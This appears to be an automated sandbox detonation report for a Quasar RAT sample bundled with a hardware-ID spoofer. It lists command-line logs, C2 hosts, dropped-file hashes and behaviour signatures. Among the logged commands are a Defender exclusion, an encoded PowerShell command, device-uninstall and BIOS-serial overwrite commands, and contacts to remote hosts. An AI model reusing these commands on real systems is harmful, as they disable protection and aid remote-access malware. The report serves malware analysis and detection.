"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | gaming7core.info | udp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
Files
memory/2380-2-0x0000000002040000-0x0000000002080000-memory.dmp
memory/2380-1-0x0000000074C90000-0x000000007523B000-memory.dmp
memory/2380-0-0x0000000074C90000-0x000000007523B000-memory.dmp
memory/1204-9-0x00000000003A0000-0x00000000006C4000-memory.dmp
memory/2380-18-0x0000000074C90000-0x000000007523B000-memory.dmp
memory/2380-17-0x000000000BF70000-0x000000000CDE4000-memory.dmp
memory/2084-20-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2084-21-0x000000007EBD0000-0x000000007EFA1000-memory.dmp
memory/1204-22-0x000000001AA70000-0x000000001AAF0000-memory.dmp
memory/2004-56-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/2004-58-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2084-59-0x000000007EBD0000-0x000000007EFA1000-memory.dmp
memory/2732-66-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/2732-70-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/1264-75-0x00000000009C0000-0x0000000000CE4000-memory.dmp
memory/1264-76-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/1264-77-0x000000001B1E0000-0x000000001B260000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 1421378b1fa1b2bec518c7b05c137359 |
| SHA1 | f9434edd2d2519865f650ad4983722b84b006310 |
| SHA256 | 9536b587fa1b06be4579cfb144cdb5d0ee43e265647a4d1e02205e0c845ed9d1 |
| SHA512 | fee464b29fc498dc58d9553b26a3818e95713682fc0072deca0a6e86027a168d4e2b55cb90c226e0b55d13f565d9fd3c42863a7ae1a8f2f3d797ce3d79adb599 |
memory/2732-72-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/2004-79-0x0000000000300000-0x000000000030E000-memory.dmp
memory/1204-80-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/2004-81-0x0000000077720000-0x0000000077721000-memory.dmp
memory/2732-85-0x00000000745C0000-0x0000000074B6B000-memory.dmp
memory/2004-86-0x0000000077700000-0x0000000077701000-memory.dmp
memory/2004-90-0x0000000000310000-0x000000000031E000-memory.dmp
memory/2004-94-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/2004-96-0x00000000005C0000-0x00000000005CC000-memory.dmp
memory/2004-97-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-99-0x0000000000610000-0x000000000061E000-memory.dmp
memory/2004-101-0x0000000000620000-0x000000000062C000-memory.dmp
memory/2004-103-0x00000000776B0000-0x00000000776B1000-memory.dmp
memory/2004-107-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-110-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-118-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-111-0x000000001AF10000-0x000000001AF90000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | afee842ff36d649e3a1756770bad94c0 |
| SHA1 | 4d95482ee57bdc9e0c80bad91a7d1f2009ad8621 |
| SHA256 | 964440431e83dfd5fd24d020381ca01ac978a9caa4222b20a42516edf2e51029 |
| SHA512 | 99715d5e262fe341df4524339c8626119dedbc448cafa9aa2e624c59c9bb49aa84499e1504c7825f73ffd0cb80a57457ae5ce3324b040da79f8ec45ebbd9543c |
C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat
| MD5 | 7c069b491dab404fbd1d9cf5b4733884 |
| SHA1 | ad481b7dd17be9fa2e887009b465250dd8a922b2 |
| SHA256 | 253c4841a4c177b3522f65124a02ea36ee39bc84ca0456b05feb6127434f7ff9 |
| SHA512 | 86623f2006bc11ce881237168e879ead47122c54a6869f9a2ba25e24771a8be23a5398606b0a3c11f642e0cb8670589dd706cfc35d1c61b4e96a975337c75e15 |
memory/2104-157-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/1720-162-0x0000000002254000-0x0000000002257000-memory.dmp
memory/1260-163-0x0000000002C44000-0x0000000002C47000-memory.dmp
memory/1732-165-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/2104-166-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/2104-164-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/2104-161-0x0000000002D30000-0x0000000002DB0000-memory.dmp
memory/1260-160-0x0000000002C4B000-0x0000000002CB2000-memory.dmp
memory/1816-159-0x0000000002B5B000-0x0000000002BC2000-memory.dmp
memory/1816-158-0x0000000002B54000-0x0000000002B57000-memory.dmp
memory/1816-156-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/1260-155-0x000007FEEC530000-0x000007FEECECD000-memory.dmp
memory/2104-148-0x0000000002660000-0x0000000002668000-memory.dmp
memory/2004-143-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/1260-142-0x000000001B750000-0x000000001BA32000-memory.dmp
memory/2004-109-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-108-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/1264-106-0x000000001B1E0000-0x000000001B260000-memory.dmp
memory/2004-105-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/2004-104-0x000000001AF10000-0x000000001AF90000-memory.dmp
memory/1264-102-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/2004-93-0x00000000005B0000-0x00000000005BE000-memory.dmp
memory/2004-91-0x00000000776F0000-0x00000000776F1000-memory.dmp
memory/2004-88-0x00000000005F0000-0x0000000000608000-memory.dmp
memory/2004-84-0x0000000077710000-0x0000000077711000-memory.dmp
memory/2004-83-0x00000000005D0000-0x00000000005EC000-memory.dmp
memory/2732-68-0x00000000745C0000-0x0000000074B6B000-memory.dmp
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 33d7a84f8ef67fd005f37142232ae97e |
| SHA1 | 1f560717d8038221c9b161716affb7cd6b14056e |
| SHA256 | a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b |
| SHA512 | c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5 |
C:\ProgramData\Microsoft\Windows\DevManView.cfg
| MD5 | 43b37d0f48bad1537a4de59ffda50ffe |
| SHA1 | 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8 |
| SHA256 | fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288 |
| SHA512 | cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82 |
C:\ProgramData\Microsoft\Windows\Disk.bat
| MD5 | 250e75ba9aac6e2e9349bdebc5ef104e |
| SHA1 | 7efdaef5ec1752e7e29d8cc4641615d14ac1855f |
| SHA256 | 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516 |
| SHA512 | 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438 |
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 81a45f1a91448313b76d2e6d5308aa7a |
| SHA1 | 0d615343d5de03da03bce52e11b233093b404083 |
| SHA256 | fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd |
| SHA512 | 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d |
memory/2732-65-0x00000000745C0000-0x0000000074B6B000-memory.dmp
memory/2084-55-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2004-48-0x00000000013E0000-0x00000000014CA000-memory.dmp
memory/1204-10-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | c4d09d3b3516550ad2ded3b09e28c10c |
| SHA1 | 7a5e77bb9ba74cf57cb1d119325b0b7f64199824 |
| SHA256 | 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3 |
| SHA512 | 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2 |
C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe
| MD5 | 79337964db81ce4114b63d41ffb36aa9 |
| SHA1 | be2adbff05b94d71e77f5afbf9dc88db287d9d02 |
| SHA256 | adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb |
| SHA512 | 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f |
memory/2080-297-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2080-295-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2080-294-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2080-293-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2080-292-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2080-291-0x0000000140000000-0x000000014000E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dd759eab95bc481e2b005b77097e6e97 |
| SHA1 | 3e10706368485b26411c7ab10be2e4671da635f9 |
| SHA256 | c2af03b9eafaa2796a851936aa5c842f9fca4b603b099a6a78be39b4f4a15aeb |
| SHA512 | 68322d03a3e81b20b21dc17affc165f1d41ea8a6f4784bef6e615534fa6107af5ff2b7aac4ca982f4de8b12c709d28bd4cdeab050316fd59264d721aa4796fb5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4f944271ab3bfa9f36c3fbd0525ccf67 |
| SHA1 | 35f22f87c68cae91e41f4449682a5b44de337a14 |
| SHA256 | 6477e36494de9cbf54c32fbc5b1368ea0ca877fb8d2d1d864e9f9d9d25236812 |
| SHA512 | 675307073139509f2bcb6aeb8c1a0870454d46cfbf2f6ed48ca4d61f2faa2ab8636aea5557d50f9d61815a465422efa564c5da3a10b11d610e7e5b766830549c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-05 11:46
Reported
2024-01-05 11:50
Platform
win10v2004-20231215-en
Max time kernel
64s
Max time network
172s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2452 wrote to memory of 3684 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Windows\system32\schtasks.exe |
| PID 2452 wrote to memory of 3684 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Windows\system32\schtasks.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28756HP-TRGT27103AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428769HP-TRGT4560FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328772HP-TRGT15309DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728772HP-TRGT15309MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
